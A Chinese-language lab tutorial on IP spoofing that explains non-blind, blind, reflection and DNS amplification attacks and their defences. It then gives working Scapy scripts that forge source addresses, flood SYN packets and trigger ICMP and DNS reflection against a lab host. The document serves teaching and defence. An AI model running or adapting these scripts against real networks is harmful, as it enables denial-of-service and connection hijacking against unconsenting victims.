一、介绍
1.1 概述
IP地址欺骗(IP Spoofing)是一种网络攻击技术,攻击者伪造其数据包的源IP地址,使其看起来像是从其他合法地址发送的。这种技术常用于各种攻击中,例如DDoS攻击、Man-in-the-Middle(MITM)攻击和拒绝服务(DoS)攻击等。
1.2 攻击原理
IP地址欺骗的核心在于攻击者能够创建带有伪造源IP地址的IP数据包。当目标系统接收到这些数据包时,会误以为它们来自合法的来源,从而执行攻击者预期的操作。由于IP协议本身并不验证数据包的源地址,这种攻击变得相对容易实现。
1.3 具体类型
-
非盲欺骗(Non-blind Spoofing):
- 攻击者能够看到目标系统和合法来源之间的通信。通过截获和分析数据包,攻击者可以伪造合法的IP地址并插入恶意数据包。
-
盲欺骗(Blind Spoofing):
- 攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。盲欺骗通常用于攻击需要少量数据包的协议(如ICMP和UDP)。
-
反射攻击(Reflection Attack):
- 攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将这些数据包发送到第三方服务器。第三方服务器会将响应数据包发送到目标系统,形成反射攻击。
-
放大攻击(Amplification Attack):
- 类似于反射攻击,但利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。
1.4 防御措施
-
反向路径转发(Reverse Path Forwarding, RPF):
- 在路由器上启用RPF检查,确保数据包的源地址与预期路径匹配。若不匹配,则丢弃数据包。
-
访问控制列表(ACL):
- 在网络设备上配置ACL,限制哪些IP地址可以发送数据包到特定的网络资源。
-
入侵检测和防御系统(IDS/IPS):
- 部署IDS/IPS,实时监控网络流量,检测并阻止异常的流量模式和伪造的数据包。
-
网络防火墙:
- 配置防火墙规则,过滤异常的IP地址和不合法的源IP地址。
-
网络分段:
- 使用虚拟局域网(VLAN)技术将网络分段,减少欺骗攻击的影响范围。
二、实验环境
受害者:192.168.134.148
三、实操演示
3.1 非盲欺骗(Non-blind Spoofing)
在非盲欺骗中,攻击者能够看到目标系统和合法来源之间的通信,因此可以伪造合法IP地址并插入恶意数据包。
实验步骤:
-
设置环境:
- 攻击者设备能够嗅探目标设备的通信。
- 使用Wireshark或类似工具观察目标设备和合法来源之间的通信。
-
捕获合法数据包:
- 捕获目标设备和合法来源之间的通信,特别是TCP连接建立过程(SYN, SYN-ACK, ACK)。
-
插入伪造数据包:
- 使用Scapy构造带有合法序列号和确认号的TCP数据包。
from scapy.all import *
from scapy.layers.inet import TCP
def non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num):
packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=12345, dport=target_port, seq=seq_num, ack=ack_num, flags="PA") / b"Non-blind spoofing attack"
send(packet)
if __name__ == "__main__":
target_ip = "192.168.134.148" # 目标系统的IP地址
spoofed_ip = "192.168.1.1" # 伪造的源IP地址
target_port = 80 # 目标系统开放的端口
seq_num = 1000 # 合法通信中捕获的序列号
ack_num = 1001 # 合法通信中捕获的确认号
non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num)
这里的话其实开两台主机通信效果最明显
3.2 盲欺骗(Blind Spoofing)
在盲欺骗中,攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。这里使用ICMP协议进行简单的盲欺骗示例。
实验步骤:
- 发送大量伪造SYN数据包:
- 使用Scapy发送大量带有伪造源IP地址的SYN数据包。
from scapy.all import *
import random
from scapy.layers.inet import TCP
def blind_spoofing(target_ip, target_port):
for _ in range(100): # 发送100个伪造的SYN数据包
spoofed_ip = "192.168.1." + str(random.randint(1, 254))
packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=random.randint(1024, 65535), dport=target_port, flags="S")
send(packet)
if __name__ == "__main__":
target_ip = "192.168.134.148" # 目标系统的IP地址
target_port = 80 # 目标系统开放的端口
blind_spoofing(target_ip, target_port)
3.3 反射攻击(Reflection Attack)
反射攻击利用中间服务器(反射器)将攻击数据包反射回目标系统。攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将数据包发送到第三方服务器。
from scapy.all import *
from scapy.layers.inet import ICMP
def reflection_attack(target_ip, reflector_ip):
# 发送多个ICMP Echo请求包
for _ in range(10): # 发送10个反射攻击包
packet = IP(src=target_ip, dst=reflector_ip) / ICMP() / b"Reflection attack"
send(packet)
print(f"Sent packet to {reflector_ip} with spoofed source {target_ip}")
if __name__ == "__main__":
target_ip = "192.168.134.148" # 目标系统的IP地址
reflector_ip = "192.168.134.147" # 反射器的IP地址,例如公共DNS服务器
reflection_attack(target_ip, reflector_ip)
3.4 放大攻击(Amplification Attack)
放大攻击利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。以下示例展示了如何通过伪造源IP地址来实现DNS放大攻击。
from scapy.all import *
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import UDP
def amplification_attack(target_ip, dns_server_ip):
# 构造DNS查询请求
dns_request = IP(src=target_ip, dst=dns_server_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="www.hubstc.com.cn"))
for _ in range(10): # 发送10个放大攻击包
send(dns_request)
print(f"Sent DNS request to {dns_server_ip} with spoofed source {target_ip}")
if __name__ == "__main__":
target_ip = "192.168.134.148" # 目标系统的IP地址
dns_server_ip = "192.168.134.147" # 公共DNS服务器的IP地址
amplification_attack(target_ip, dns_server_ip)
四、注意事项
- 合法性和道德规范:确保在合法和授权的环境中进行实验,不得在未经授权的网络上进行IP地址欺骗实验。
- 网络隔离:确保实验网络与生产网络隔离,避免对实际业务造成影响。
- 监控与恢复:实验过程中实时监控网络和系统状态,实验结束后立即停止攻击工具,并确保系统恢复正常。